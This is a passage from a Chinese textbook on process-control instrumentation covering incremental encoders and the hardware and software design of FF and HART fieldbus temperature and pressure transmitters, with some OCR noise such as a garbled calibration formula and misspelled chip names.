。增量编码器最大的特点是 , 可添加电路 , 产生 1周期信号的 2 倍 、4倍脉冲数 ,提高电流的分辨率 。此外 ,可把每旋转一周发生的 2相信号作为 1旋转内 的原点使用 。需要高分辨率时 ,一般可采用 4倍增电路方式。(如果把 A相 、B相的上升 、 下降波形分别进行微分 ,可得到4倍输出 ,分辨率则为 4倍)。 与轴旋转同时写入光学图案 的磁盘时 ,通过两处狭缝的光就会相应地被透过 、遮断 。这种光通过与各自狭缝相对的受光 元件转换为电流 ,通过波形整形后 ,成为2个矩形波输出 。另2处的狭缝要配置在与矩形波 输出的相位差1/4间距处 。 利用增量编码器测速的方法有 T法( 一定脉冲数测时间)、 M 法 ( 一定时间测脉冲数) 和 M/T法(两者综合)。 3.3.2 过程控制系统传感器 3.3.2.1 过程控制系统温度传感器 典型 FF现场总线温度变送器有罗斯蒙特 (Rosemount) 公司 3244MV型温度变送器, 它支持 FF通信协议和 HART通信协议 , 采用了专用集成电路的数字技术 , 不仅确保了精 度最高 , 而且保证了信号完整性 。微处理器用一套电路板即可接收 RTD, RTD温差 、热电 偶 、欧姆及毫伏输入 。另外 ,仪表还应用了固态电子技术 , 每台变送器环境温度特性化 ,从 而保证在较宽的工作温度范围内 ,变送器精度最高 ,漂移最小 ,可以接受任意两种类型传感 器的组合(RTD和/或热电偶), 而且这两种传感器均以数字信号输出 。 当传感器一旦发生 故障 ,变送器的 Hot Backup TM 热备份功能可以实现传感器自动切换 。变送器具有输出 5 个测量变量的性能 。 除了4~20mA模拟信号外 , 变送器还能同时输出四个数字信号: 传感 器1、传感器2、温差及端子温度 。变送器的软件设计允许对变送器进行远程测试和组态, 可以使用 HART通信器 、Fisher—Rosemount控制系统或者其他任何支持 HART通信协议 的主机 。用通信器可以通过软件组态选择传感器类型 。 另外 , 也可选择最合适的显示刻度, 以便于以工程单位直接读数 。变送器的组态数据储存在位于电子线路模块里的永久性 EEP- ROM 存储器中 。 当电源中断时 , 该数据驻留在变送器中 , 再次通电时 , 变送器可立即运 行 。变送器有很强的自诊断功能 ,用户可以在线完成对变送器 、 回路电源 、模拟信号 、数字 信号及传感器的测试 ,整个温度测量系统完整性的确认在几秒钟内即可完成 。 图 3-27为 3244MV型温度变送器的结构示意图 。 (1) 温度测量仪表的性能 。 测量温度参数的现场总线变送器符合基金会现场总线通信协议 ,双向数字通信 , 多站挂接 ,有其功能块应用进程并可与其他总线设备构成用户应用等 。 温度变送器的技术性能 如下 。 1) 输入信号: 3个输入通道 ,分别对应差压 、压力和温度参数 。 2) 输出信号: 符合 FF现场总线标准的数字信号输出 ;FF低速总线(H1), 31.25kbit/s, 电压方式 ;二线制 。 3) 供电电源: 由总线供电 , 9~32V DC;静态电流消耗 ,小于15mA(圆卡8mA); 输 出阻抗 ,本安应用阻抗必须大于或等于 400(频率范围: 7.8~39kHz), 非本安应用阻抗必 须大于或等于3000(频率范围: 7.8~39kHz)。 4) 采用液晶显示 。 5) 功能模块: 至少具有一个多路模拟输入功能模块(MAI), 或者3个标准模拟输入功能 模块(AI), 可以接收变送块的测量值 ,并变换之 , 以作为其输出提供给其他功能模块使用 。 6) 资源模块: 按照 FF的资源模块规范设计实现 ,说明设备的硬件特性 。 7) 测量精度高 。 (2) 温度测量仪表总体架构 。 温度变送器由两部分组成 ——— 通信圆卡和仪表卡 ,两部分均包含各自的软硬件 。 圆卡包 括通信控制器 、通信栈软件及通信接口 , 主要提供总线接口 、总线通信以及功能块应用的处 理能力; 仪表卡负责采集现场信号 ,进行信号处理 ,将处理完毕的信息传送至圆卡 ,并提供 了必要的人机接口 。温度变送器总体设计架构如图3-28所示 。 图3-28中 A为仪表卡部分主要用于温度和其他参数的传感 、输入 、数据处理和显示功 能 ;B为用于现场总线通信的圆卡部分 。 1) 圆卡系统结构与功能 。 圆卡是一种开发现场总线现场设备所需要的通用产品 。使用 圆卡可以免除设备开发者开发现场设备时 ,在考虑满足 FF物理层标准和一些通用电路上而 花费大量时间和精力 ,使开发者可以集中精力去设计开发产品的其他应用特征 。 圆卡主要完 成三个任务: .接收 、发送总线信号 , 完成总线通信功能 。该任务由通信栈完成 , 通信栈以库形式提供 , 需在用户开发的最后阶段进行链接 。 圆卡网络可视 , 并可实现与总线其他仪表的 连接 。 .功能块调度 、处理 。 在用户应用程序中开发功能块的执行动作 , 如 AI、 PID功能 模块被调度执行时的数据处理算法 , 前者可进行输入信号滤波 , 后者可进行 PID等数据 处理 。 .通过串行函数实现与仪表卡之间的串行通信 。 圆卡的以上功能是通过圆卡应用的开发 来实现的 。 以下是圆卡应用开发的环节: 首先要写出设备模板 ,将设备模板转换为 C代码, 生成设备组态 ,并将设备组态转换为 C代码; 然后编写用户应用程序 C代码 , 程序中需要 写出功能块的callback函数 ,并在 userstart 函数中注册callback函数 , 编写功能块算法 ,定 义串行函数 、系统时钟速率和 RAM 大小 ,定义并安装中断处理器; 最后将所有的 C代码进 行编辑 、链接 ,生成二进制代码并写入圆卡的闪存 。 2) 仪表卡结构与功能 。按照温度仪表总体架构 , 给出了仪表卡的性能如下: .根据对差压 、压力和温度信号的测量精度要求 ,选择合适的敏感元件 ,并设计必要的 信号调理电路 。 同时 ,还要为敏感元件选择合适的激励源 , 以实现低功耗和高精度测量 。 .选择合适的模/数转换器件 。该器件至少应具有 3个输入通道 , 应能在保证低功耗的 前提下实现较高的转换精度 。 .选择合适的仪表卡 CPU ,在满足系统要求的前提下实现低功耗的设计 。 因为仪表卡 仅实现基本的测控功能 ,所以目前广泛使用的8位单片机即可满足要求 。 .选择低功耗的液晶显示模块和 EEPROM。 .仪表卡的软件需要实现的功能有: 各种器件的初始化 、模/数转换 、数据处理 、液品 显示 、 响应来自圆卡的串行命令 。 其中 , 仪表卡完成仪表的测量 、计算 、显示等功能 , 是仪表的本体部分 。 通信圆卡为 数据传输与控制部分 , 主要完成现场总线的通信任务以及各种控制算法 。 由仪表卡对差 压 ΔP、压力 P、温度 T进行信号采集 , 在 8位单片机内完成非线性校正 、工程量计算等 工作后 , 将数据送到通信圆卡 。 通信圆卡可根据需要将数据以约定的格式发送出去 , 也能调用控制功能模块 , 完成一定的控制任务 。 另外通信圆卡接收外来信息 , 如参数设定 、 报警值设定等 。 圆卡和仪表卡安装于同一仪表壳体内 , 两卡之间的信息传输采用串行通 信方式 。 (3) 温度测量圆卡应用 。 1) 硬件组成部分 。 总线圆卡是一个现场总线协议的通信控制部件 , 它使得仪表允许 与符合 FF H1标准的网络连接 。 它由总线供电 , 使用 MOTOROLA的 MC68331内置处理 器以及可编程 128KB×16闪存以运行栈接口库 、功能块壳和用户应用 。 一个 128KB×16 SRAM 提供易失性存储器 。 同时还有一个 4KB×8的串行 ROM(SROM), 可作为非易 失性存储 器 , 用 来 存 储 总 线 管 理 信 息 库 参 数 和 块 参 数 。 圆 卡 的 硬 件 结 构 如 图 3- 29 所示 。 图 3-29 圆卡的硬件结构图 圆卡提供到总线的接口 。它与设备测量电 子部件的连接是通过子卡适配器实现的 , Na- tional Instruments公司提供用于0~5V和4~ 20mA信号的子卡适配器 , 用户也可自行开发 设备元件的适配器 。 适配器的接口完全标准 化 ,包括与圆卡相连接的同步和异步串行及并 行I/O, 以及向设备元件供电的 5V/4mA 电 源 。用户可根据这些标准接口 , 选用合适的 CPU及外围芯片 , 设计完成独特功能的测控 电路 。 2) 软件组成部分 。 运行在总线圆卡上的 通信栈协议代码已经由供应商完成 。 总线圆片 接口工具中提供了功能块壳 (Function Block Shell), 这是一个介于应用程序和通信栈之间 的接口 , 已只需要用户有很少的关于现场总线通信协议的知识 ,从而简化了总线设备开发的 应用程序员接口(Application Programmer's Interface, API)。 此外 , 还提供一个总线协议 栈的可链接库 ,用户应用程序在下载到圆卡之前 , 将圆卡应用和功能块与协议栈 (FF基金 会通信软件) 相链接 。 圆卡应用软件包括: .应用程序结构: 设备启动后 , 自动激活从 userstart 函数开始的用户应用 。 .进程注册 、功能块应用进程使用注册函数以通知功能块用户应用的特性 ,包括用户定 义的数据类型 、物理块 、变送块 、功能块 、块参数 , 以及callback函数 。另外 , 用户必须定 义一些其他的通用组态信息 。在与功能块或总线进行链接前必须进行注册 。 .数据的所属功能块组织并拥有 OD。每个资源块 、功能块和变送块参数都有一个所属 特性 。 .串行函数: 串行函数在圆卡和串行设备 (仪表卡) 之间提供一个传递数据的通用方 式 。它们与用于与串行设备进行通信的通信协议 , 以及功能块函数调用相互独立 。 .组态文件:组态文件包括数据链接组态和系统管理组态 ,它们对设备类型(基本设备或链 路主设备)、 节点地址 、设备ID号 、设备位号 、设备调度时间单位 、调度时间表进行了定义。 .用户应用文件: 用户应用程序 user. c为实现变送器功能的主要部分 。 它利用功能块所提供的与 FF通信栈的高级接口 ,处理有关网络通信的参数读写 、功能块调度等任务 。 圆 卡与仪表卡的通信功能放在功能块中调度执行 ,判断为 AI功能块调度执行时 ,将需要的命 令按照与仪表卡约定好的格式进行编码 ,并送至串行口 。 3) 圆卡与仪表卡的通信 。 圆卡与仪表卡的连接如图 3-30所示 。 总线圆卡除了提供到 现场总线的接口 ,还可为外部电路提供5V/4mA的电源 。通过2×21的插针接口 W1, 总线 圆卡可方便地与用户开发的仪表卡相连 ,从而实现与现场信号的连接 。 图 3-30 圆卡与仪表卡的连接 总线圆卡除了提供到现场总线的接口 ,还可为外部电路提供5V/4mA的电源 。通过2×21 的插针接口 W1,总线圆卡可方便地与用户开发的仪表卡相连 ,从而实现与现场信号的连接 。 (4) 温度测量仪表卡应用 。 1) 仪表卡电路结构 。对仪表卡的硬件整体结构和采用的主要元器件进行介绍 , 体现出 低功耗的设计目标 。如图3-31所示为仪表卡的硬件整体结构 。 图 3-31 仪表卡的硬件整体结构 敏感元件的选型及其激励方法是决定系统测量精度和功耗的主要因素 。铂电阻具有高熔 点 、高稳定性 、抗氧化等特点 ,被用来作为 —100~+630℃范围的国际标准温度计 ,可选择 铂电阻 Pt100作为温度测量的敏感元件 。对于压力和差压信号的测量 , 温度仪表采用瑞士 KELLER公司的 PD—10和 PAA—10分别作为差压和压力的敏感元件 。 KELLER公司的 10系列压阻式压力敏感元件具有高稳定性和高分辨率 。仪表采用恒流源作为敏感元件的激 励源 , 以得到较高的测量精度 。 主要部件的选择如下: .ATMEL公司8位 Flash单片机系列的 AT89LV52作为仪表卡的 CPU。 . AD7714具有放大 、滤波 、A/D转换功能 ,选择 AD公司的 AD7714芯片来实现 。 .恒流源选择 REF200, 它是 BURR—BROWN公司生产的 ,具有高精度 、低功耗 、低 温漂和宽电压范围的恒流源 。REF200在一个单片集成电路上集成了三个电路内置块 , 包括 两个100mA的电流源和一个电流镜像 。 .液晶显示模块可选择北京青云的 LCM141。该液晶显示模块适用于流量 、温度 、压力 等仪表 ,带14段条码 ,分两行显示 ,可以模拟显示瞬时量 ,其功耗为60μA。 .看门狗电路芯片选用美国 Xicor公司的 X2s04s芯片 。 它将看门狗定时器 、 电源电压 监视和串行 EEPROM 组合在单个封装内 , 降低子系统成本和对电路板空间的要求 ,并增强 了可靠性 。 2) 仪表卡软件实现 。仪表卡的软件将实现模/数转换 、数据处理 、液晶显示以及串行通 信等功能 。程序包括主程序 、 中断服务程序等子程序 。 图 3-32 主程序流程图 .主程序 。 CPU 上电复位后 , 需 要在主程序中进行初始化工作 , 其中 包括 CPU 的初始化 、AD7714的初始 化及液晶模块的初始化 。 主程序的流 程图如图3-32所示 。 . AD7714的初始化 。 AD7714的 初始化流程图如图3-33所示 ,这仅是 对温度通道的初始化过程 , 另外两个 通道的流程与此类似 , 只是要写入的 数据有所不同 。 上电或复位后 , 首先 要激活 AD7714, 也就是激活 AD7714 的串行接口 。 .液晶模块的初始化 。 液晶显示 模块 LCM141的初始化流程如图3-34 所示 。初始化完毕后 , 把想要显示的 数据送到液晶模块相应的显示缓存中, 即可正确地进行显示 。 为保证液晶显 示模块 LCM141能够正确的工作 , 则 必须 严 格 地 按 照 时 序 , 用 软 件 控 制/ ICS,/RD,/WR 和 DATA 的 状 态, 从而实现各种操作的正确完成 。 .外部中断 0服务程序 。 AT89LU52的 P3.2(/INTO) 引脚同 AD7714的/DRDY引 脚相连 。每当 AD7714的数据寄存器中有新的转换字可供使用的时候, /DRDY引脚变为逻 辑低电平, /INTO被触发 ,进入外部中断0服务程序 。如图3-35所示为外部中断0服务程 序的流程图 。 .采样及数据处理子程序 。采样及数据处理子程序主要完成以下任务: 分别将温度通 道 、差压通道和压力通道的缓存中的转换字转移到各自的存储空间中 , 每个通道均分配到了20个字节的存储空间 , 可以存储 10个最新数据: 每次存满 10个最 新数据 ,就分别对每个通道的数据 进行处理 。处理完毕后 , 将存储空 间 的 首 地 址 指 针 和 计 数 变 量 COUNT复位 。 如图 3-36所示为 读温度通道子程序的流程图 。首先 将 ADFLAG清零, 然后选择通道 并初始化该通道 ,下一步就是把外 部中断0打开 ,等待进入外部中断 0服务程序 。 如果外部中断 0服务 程序采集该通道数据成功, 则 AD- FLAG标识位被置 1, 该子程序将 FLAG置于3,结束返回 。 当各个通道分别采集够 10个 数据后, 需要求出平均值, 方法是 去掉最大值和最小值, 求其他 8个 数据的平均值 。然后 , 还须对各个 通道的平均值进行一些必要的数据处理, 如非线性校正 。最后 ,还需要对处理后的数据进行运算 ,把它们换算成为工程量 ,存 在为之分配的存储单元中 ,等待定时显示子程序的调用或串行命令响应子程序的调用 。 以上 工作是分别在各个通道的计算子程序中 ,调用平均值计算和非线性校正等子程序来完成的 。 3) 仪表卡输入信号处理 。 图 3-36 读温度通道子程序流程图 .信号的非线性校正 。 由于各种因 素 ,传感器的输出量与被测物理量之间 的关系绝大部分是非线性的 。 仪表中的 非线性校正采用了分段二阶曲线拟合法 。 根据曲线的特点 ,将该曲线分成若干段, 把段的起始点即段号存入 EEPROM , 然 后在每一段都用二阶方程去逼近曲线 y =ax2 +bx +c (3 - 6) 并将二阶方程中的系数 a、b和c存 入 EEPROM。 .温度测量的零点调整和满量程调 整 。对于温度测量 , 铂电阻阻值与 A/D 转换结果为 R = 012 k(1) 65(2)553(00)5XD (3 - 7) 式中 ,0.2mA为恒流源提供的电流 。记 R =K'XD (3 - 8) 仪表卡收到来自总线圆卡的调整命令 ,从 EEPROM 中读出修正系数 K', 就可以调整 温度测量的满量程 ,读出修正系数 A 就可以调节温度测量的零点 。 在实际标定过程中 , 为 了避免测量恒流源电流值引入的误差 , 采用温度测量上限 所 对 应 的 精 密 电 阻 阻 值 (如 130.90Ω对应80℃) 所对应的 A/D转换结果作为电阻的标度变换系数 ,有助于快速校准 。 3.3.2.2 过程控制系统压力传感器 典型的压力现场总线仪表有霍尼韦尔 STD924系列仪表 。这种压力仪表具有先进的传感 器技术: 采用离子注入硅技术 ,在差压传感器上集成了静压和温度传感器 , 随时修正过程温 度和静压引起的误差 ,提高了测量精度和稳定性 。具有高可靠性 、高稳定性 、高精度和高耐 静压 。现场总线压力仪表的测量范围宽 , 可在危险环境使用 ,具备各种本质安全和防爆认 证 。压力现场总线仪表可选 HART协议或现场总线 (FF) 通信协议 , 使用现场通信器或 MCT多协议通信器对变送器的组态 、校验和故障诊断 。也可用 SCT组态工具组态 。霍尼韦 尔压力现场总线仪表的这种特性代表了现场总线压力仪表的特点 。 (1) 现场总线压力变送器结构 。 现场总线压力变送器为了实现变送器的基本功能 ,如线性化处理 、温度压力补偿 、量程 调整和数字通信等 ,必须具备单片机 、A/D、D/A和通信芯片 。 图 3-37是 HART协议压 力变送器的系统框图 , 图中注明了可选的单片机和主要芯片 。传感器模拟量信号经 A/D转换成数字量后送入单片机 ,单片机将处理后的数字通过 D/A转换器 , 经 V/I转换电路输出 4~20mA的标准电流信号 。 现场总线压力变送器是智能仪表的硬件结构为基础的 , 例如抗干扰电路 、传感器电路 等 , 而它的优势所在就是引入了微处理器和数字通信 , 可以选择是 Philips单片机 LPC932, 它的低功耗特性 、运行速度快 、片内 RAM 、片内 EPROM 等一些新增的功能 , 大大减少了 元件的数目 , 简化了硬件结构 。为兼容4~20mA标准电流信号 , HART协议智能变送器必 须可工作在 4~20mA两线回路中 , 这就意味着可用来为变送器供电的电流不能超过 4mA。 在实际应用中 , 为兼容数字和模拟两种信号 , 通常将数据频率信号通过 U/I转换电路的调 整 ,转换为幅度为±5mA的频率信号 ,叠加在两线制的4~20mA电流环上 ,但环路上电流 瞬时最大值I=4.5mA,最小值I=3.5mA,如果向变送器供电过多 , 超过 3.5mA,将导致 数字信号负半周失真 ,再考虑到调节量所需的余量 , 在此要求给变送器的供电电流不超过 3.4mA。在供电方面 , 主要有两种方式 ,一种是直接将输入电压稳压成所需电压 5V后向系 统供电 ,这种方法总电流必须控制在 4mA以内; 另一种采用 DC-DC供电方式 , 只要 DC- DC变换器的效率足够高 ,在功耗控制上它比第一种方式要宽松得多 ,但同时又要考虑变换 器的线性稳定性因素可能带来的负面影响 。采用同一电压源供电 , 但由于 U/I转换电路 一 般要求较高的电压 ,所以给U/I转换电路提供 +24V电压 , 其余电路都是 +5V电源供电, 这样极大限度地抑制了电源干扰的影响 , 而且由于整个硬件电路设计中包含有模拟电路和数 字电路两部分 ,单片机只处理数字信号 , 而传感器测量输出的信号是模拟信号 , 为了防止数 字和模拟信号的相互影响 ,采用了隔离技术 ,将传感器和单片机系统模块分开 ,对于系统中 存在的其他模拟和数字电路 ,则采用部分隔离技术 , 尽可能使模拟电路和数字电路相隔较 远 ,而且线路互不交叉和覆盖 。 同时 ,在接地方面 ,采取数字电路接数字地 ,模拟电路接模 拟地 ,最终通过一点把数字地和模拟地连接起来 。 1) 传感器模块 。传感器是测量系统中的一种前置部件 , 它将输入变量转换成可供测量 的信号 。进入传感器的信号幅度通常是很小的 , 而且混杂有干扰信号和噪声 。为了方便随后 的处理过程 ,首先要将信号整形成具有最佳特性的波形 ,有时还需要将信号线性化 。压力传 感器采用半导体压阻传感器 , 为提高满量程输出 ,减少零点漂移和提高线性度 ,通常把力敏 电阻(即感压电阻) 连成惠斯登电桥 , 每个桥臂电阻都比较大 ,一般为2kΩ。 电桥一般采用 恒流源供电 ,这种方式的优点是电桥的输出与桥臂电阻无关 , 同时采用的又是双电源供电, 所以可以进一步减小传感器的非线性和温度对传感器输出灵敏度的影响 。 A/D转换器 AD7714的两个全差分通道 AINI、AIN2和 AIN3, AIN4分别对差压传感 器 TRS1和静压传感器 TRS2的差压和静压进行模数转换 , 而 AM 、AM 组成的准差分输入 通道对 TRS1的恒流源输入进行监测 , 同时 ,AIN3、AIN4对静压传感器 TRS2进行监测, 实现对静压的补偿 ,AIN5测得的 A/D值对整个变送器进行温度补偿 。 2) 单片机 LPC932应用 。LPC932是 PHILIPS公司在成功推出 LPC700系列单片机之 后 , 又推出的一款 FLASH 小引脚 、高性能低功耗的 LPC900系列中的典型代表 , LPC932 单片机以先进的 CMOS工艺制造 , 通过片内集成的丰富特性实现了非常高的性价比 , 其在 速度上6倍于标准 80C51单片机 , 支持 400K的高速 I2C总线 、全双工高速同步串行接口 SPI总线 ,具有 EPROM(可用来存放器件序列码及设置参数) 及 512字节片内附加 RAM、 8K Flash程序代码空间 、ISP/IAP在线和在系统可编程功能等 , 使其更具个性化 , 同时也更适合当前各种各样的嵌入式系统设计要求 。 与其他的高集成度IC一样 , LPC932所采用的技术使其电源电压限制在 5V以下 , 标称 工作电压范围为2.4~3.6V,虽然电源电压较低 ,但 V0口仍可承受 5V电压 , 也就是说虽 然I/O口不能主动驱动高于电源电压的输出但可被外部上拉到 5V。 LPC9321/0口的优异特 性在于它不需要任何外部元件就可以运行 , 除电源和地之外的所有引脚都可作为 I/O口, 也就是说 , 28引脚的 LPC932最大I/O口数为 26个 , 最少为 23个 , I/O口均可通过 SFR 进行单独配置 。LPC932有2个16位的通用定时器/计数器 , 与标准 80C51定时器 0和定时 器1兼容 ,两者均可配置为定时器或计数器 ,有五种工作模式 ,可通过编程选定 ,另外增加 了定时器0/1溢出时 T0/T1脚自动翻转功能选项 。PHILIPS公司还为 LPC932设计了 4中 断优先级结构 ,这为它的15个中断源的处理提供了极大的灵活性 , 任何一个中断源均可通 过编程实现单独使能和禁能 , 同时还有一个全局使能位 , 可使能所有中断 。Flash程序存储 器也方便子系统的开发 , 它提供电路中的电擦除和编程 , 片内产生的擦除和写入时序为用户 提供了良好的编程接口 ,通过使用 VDD电压即可进行编程和擦除算法 。51指令系统专门用 于80C51及其派生系列单片机 , 功能很强大 , 它含有加 、减 、乘 、 除 、 比较 、堆栈操作和 多种位操作 , LPC932也沿用了该指令系统 , 以便于实际应用和开发 。从以上的功能和特点 可知 , LPC932是一款很适合智能仪表仪器的单片机 。 3) A/D模块 。为实现现场总线变送器的功能 ,需要一个增益可调的仪表放大器和一个 分辨率至少在16位的 A/D转换器来实现对传感器输出模拟信号的放大和模数转换 , 这样才 能达到变送器的高精度 、 自动调节量程和大量程比的设计要求 , 而对差压变送器还需要对静 压和温度进行采样 ,从而实现补偿提高全范围的测量精度 ,这就需要一个多路转换器实现通 道间的切换 。考虑到如果选用分立元件必然会有相当大的功耗引入 ,难以满足 HART协议 智能变送器功耗要求 ,可选择 Analog Device(AD) 公司推出的 AD7714, 它是为兼容 4~ 20mA的智能变送器而设计的专用 A/D器件 , 将增益可调的仪表放大器 、多路转换和 A/D 转换器集成在一个芯片上 ,功耗很低 , 为实现系统的功能提供了方便 。 AD7714芯片带自校准功能的 Σ — Δ转换技术 ,其内部具有完整的模拟前端 , 直接从传 感器接收低电平信号并输出串行数据结果 ,输入信号加至专用增益可编程前端放大器 , 然后 进入模拟调制器 ,调制器输出通过一个低通可编程滤波器进行处理 ,该滤波器通过片内控制 寄存器可对此数字滤波器关断 、输出速率和稳定时间进行调整 。它采用三线串行口与单片机 或 DSP系统连接 ,其中串行接口包括 8个片内寄存器组 , 在系统中的用串行口通过软件编 程可以实现通道选择 、增益设置 、信号极性 、滤波器频率设置 , 同时具有自校准 、系统校准 和背景校准功能 ,可以消除零点误差 、满量程误差及温度漂移的影响 ,对 AD7714的任何 一 种操作 ,必须首先对通信寄存器写入相应代码 ,然后才能对其他寄存器读写 。 4) D/A模块 AD421。为将数字频率信号转换为 ±0.5mA的频率信号 , 叠加在两线的 4~20mA电流环上 ,还需要附加耦合电路 , 这样必然会造成更大的功耗开销 , 而美国 AD 公司的产品 AD421,是专门为 HART协议智能仪表设计的 ,包括 4~20mA电流环的 16位 D/A转换器 , 与 HART协议兼容 , 其开关模块和滤波器功能块 , 可将 HART电压信号转 换为±0.5mA电流信号 , 为应用带来了方便 。 AD421是一种单片低功耗 、高精度 AD器件 , 它由电源调整器 、 16位 Σ — ΔDAC、 电 流放大器 、数字接口和参考电压等5部分组成 。 电源调整器用于在供电回路中产生本身使用的电源 , 它由 DRIVER引脚控制了一个耗 尽型 FET产生 。供电回路的最高电压取决于外接调整管 (FET) 的耐压 。 16位 Σ — ΔDAC 将装在到输入锁存的数字信息转换为电流信号 , 它由带有连续时间滤波器的二阶调制器组 成 。调制器位流控制一个转换电流源 ,该电流源由三个电阻和电容滤波器滤波 ,滤波器的电 阻已在片内集成 , 而电容需由 C1、C2、C3引脚接入 。DAC输出电流驱动由工作放大器和 NPN晶体管组成的电流放大器 , 在 DAC输出和 LOOP RTN引脚之间接一 80kΩ的电阻, 以设定流过 LOOP RTN引脚的电流 。BOOST引脚通常与 Vcc引脚连在一起 , 使总回路电 流变化范围为4~20mA。 当电源调整器的 FET管不能提供20mA的电流时 , 可以通过一个 外接 NPN型三极管直接从供电回路获得电流 。 数字接口由 DATA、CLOCK、LATCH 三 根线组成 ,可直接与 MCU串行口相接 。参考电压部分可提供1.25V和 2.5V精密参考输出 电压 , 它的2.5V参考电压供自己和 AD7714使用 。 AD421有2种工作方式: 4~20mA输出方式和3.5~24mA报警输出方式 。 LPC932和 AD421接口采用三线制串行接口 , 为了满足信号传输过程中对噪声 、安全 性和距离等方面的要求 ,在二者串行口之间加光电隔离器 。 通过 LPC932的 P2.1、P2.7和 P2.6连接到 AD421的 LATCH、CLOCK和 DATA端 。 在 CLOCK信号的上升沿 ,数据由高位到低位被转载到 AD421内部的输入移位寄存器; 在 LATCH信号的上升沿 ,该寄存器的数据传送到 DAC锁存端 。 5) 通信模块 。SMAR公司生产的 HART2012是实现智能变送器现场通信或控制室控 制的核心芯片 。 HT2012是一款符合 Be11202标准的单片 COMS低功耗 FSK调制解调器, HT2012芯片用来实现 HART协议中通信信号的解调及调制过程 , 它是为设计过程控制仪 器检测和其他低功耗装备中提供 HART通信协议的专用芯片 。 HT2012主要特性如下: ①工作在 Be11202标准下 ,传输速率是1200bit/s ,半双工操作 。 ②标准频率是1200Hz和2200Hz。 ③单一 3~5V供电 ,低功耗 ,典型值为40μA。 ④需外部提供460.8kHz的时钟 。 ⑤CMOS和 TLL的I/O兼容 。 HT2012主要有四个功能模块: 载体检测模块 、时钟模块 、调制和解调模块 。 时钟模块 接受外部输 入 的 460.8kHz时 钟 信 号 , 用 于 建 立 内 部 时 钟 , 正 常 使 用 时 , 内 部 时 钟 为 19.2kHz, 输出到插针 2上 , 供 外 部 电 路 使 用 460.8kHz分 别 产 生 1200Hz(表 示 0) 和 2200Hz(表示1) 的两种频率 ;从调制器模块的ITXD输入不归零制 (NRZ) 的数字信号, 并将数据调制成1200Hz和2200Hz, 从 OTXA插针输出 ;从解调器模块的IRXA输入 FSK 调制方波的数字脉冲 , 解调后的数字信号从 ORXD输出; 载体检测的频率范围: 1000~ 2575Hz, 当IRXA上的信号频率在此范围内时 , 载体检测信号 OCD必定为低 。 HT2012HART芯片用于外设到微处理器或微控制器的连接 , 使用中必须提供两个接 口 ,一为到单片机的接口 ,另一为到介质(即外设) 的接口 ,下面分别叙述 。 HT2012调制解调器是半双工的 , 当其中一个运行时 ,调制器或解调器中的一个就会停 止 。单片机发出控制信号到 HT2012的INKS引脚 , 如果INKS为逻辑 0,调制器使能 , 发 送数据被调制 ,从 OTXA引脚输出 ,此时解调器关闭 , 以节省电源功耗; 同样 , INRTS为逻辑1,解调器使能 ,从IRXA引脚来的数据被解调 ,输出到 ORXD引脚上 ,此时调制器关 闭 , 以节省电源功耗 。调制器激活时 , 有效载体存在 , 载体检测输出端 OCD低电平有效, 表示对通信芯片进行载波发送 ,单片机查询此线有效 ,则开始解调数据 ,这一点改进了通信 的实时性和灵活性 。 HT2012与单片机的工作频率不同 ,采用 UART传输方式 。 UART传输有 4种操作模 式 ,如选用模式3,TXD脚发送 ,RXD脚接收 , 每个数据 11位 , 符合 HART协议帧的格 式 。LPC932在标准80C51UART基础上还增加了帧错误检测 、 间隔检测 、 自动地址识别 、 可选的双缓冲以及几个中断选项 。 因为 HT2012接收和发送数据是在同一介质上进行 ,介质 接口一般由两部分组成: ①调制输出要经过波形整形器 ,选用的是74HC126(4个三态输出 缓冲器) 将整形后的电压信号输入到 AD421的开关电流源和滤波器功能块中 , 并可实现 HART电压信号由±0.5mA电流信号的转换; ②解调输入时要经过带通滤波器 , 在此选用 的是 TLC27L2C, 它由两个运算放大器及电阻 、 电容组成 ,将 4~20mA环路上的 ±0.5mA 电流信号的转换为 HART电压信号 , 经 HT2012解调再送入到单片机的串行通信接口中, 从而完成数据的接收任务 。 (2) 现场总线压力仪表软件 。 智能变送器的系统软件不仅处理来自通信接口 、手持终端的命令 , 实现人机对话 , 更 重要的是它具有实时处理能力 , 即根据被控过程 (对象), 实时申请中断 , 完成各种测 量 、控制功能 。 它的功能主要由中断服务程序来实现 。 智能变送器的软件系统按其功能 为三个模块 , 监控程序 、测控程序和通信程序 , 其中监控主程序是核心部分 , 因为整个 系统是在监控程序的控制下工作的 , 它直接影响系统的 工 作 和 运 行 。 软 件 系 统 结 构 如 图 3-38所示 。 图 3-38 软件系统结构 1) 监控程序 。监控主程序是主程序 ,是整个仪器软件的核心 , 上电复位后仪器首先进 入监控主程序 。 主监控程序一般都放在0号单元开始的内存中 , 它的任务是识别命令 、解释 命令 ,并获得完成该命令的相应模块的入口 。监控主程序起着引导仪器进入正常工作状态, 并协调各部分软硬件有条不紊地工作 。 监控主程序通常包括对系统中可编程器件输入/输出口参数 、定时器 、异步串行通信口的初始化工作 , 以及实时中断和处理模块等功能, 除初始化和自检外,监控主程序一般总是 把其余部分联系起来构成一个循环 , 仪表的所有功能都在这一循环中周而复始有选择地执行 。不同的硬件 、不同的系统采取的主监控方法也不相同 。在这种监控系统中 ,首先进入初 始化 ,再进行自检 ,自检后即等待键盘/外设中断 , 若有中断 , 首先区分是键盘中断还是外 设 。无论什么中断 ,执行完之后 ,都必须返回到主监控程序中 ,继续执行监控程序 。编制程 序可能产生的各种结果 , 防止出现死循环 。 在智能变送器中,ROM 、RAM 和 EPROM 是用于存放程序 、 常数和表格的载体 。 由 于 ROM 是只读的 ,对其进行诊断只需判断从 ROM 中读出的资料是否正确即可 。具体的诊 断方法有多种 , 常见的是奇偶校验法 。RAM 主要用于存储一些参数和中间计算结果 , 它比 ROM 多了一些写入功能 。 因此对 RAM 而言 , 诊断时要看写入内存的资料和从内存中读出的资料是否正确 。 2) 测控程序 。测控程序主要包括数据采集程序(对温度/ 压力的 A/D采样)、 数据处理程序(数据融合技术 、数字滤波 等) 和数据输出程序 (阻尼量程和 D/A转换) 等功能 。 在测 控程序中用到的许多参数都是可以通过网络由主机发送下来 的 。数据采集程序主要是对温度 、压力信号采样 ,采用中断采 样方式 , 由系统定时器触发采样 , 以此来保证采集的实时性和 准确性 。 硅 压 阻 式 压 力 传 感 器 的 两 个 输 出 信 号 如 图 3- 39 所示 。 系统所采用的硅压阻压力传感器由恒流源供电 , 电桥的 B、D两端输出电压U 为输入参量压力 P 的输出信号; A、C 两端输出电压为输入参量温度 t 的输出信号 。在压力传感器的传感器的两个输出信号量程范围内确定n个压力标定点 , 在其工作的温度范围内确定 m 个温度标定点 , 对应各个 标定点的输出U 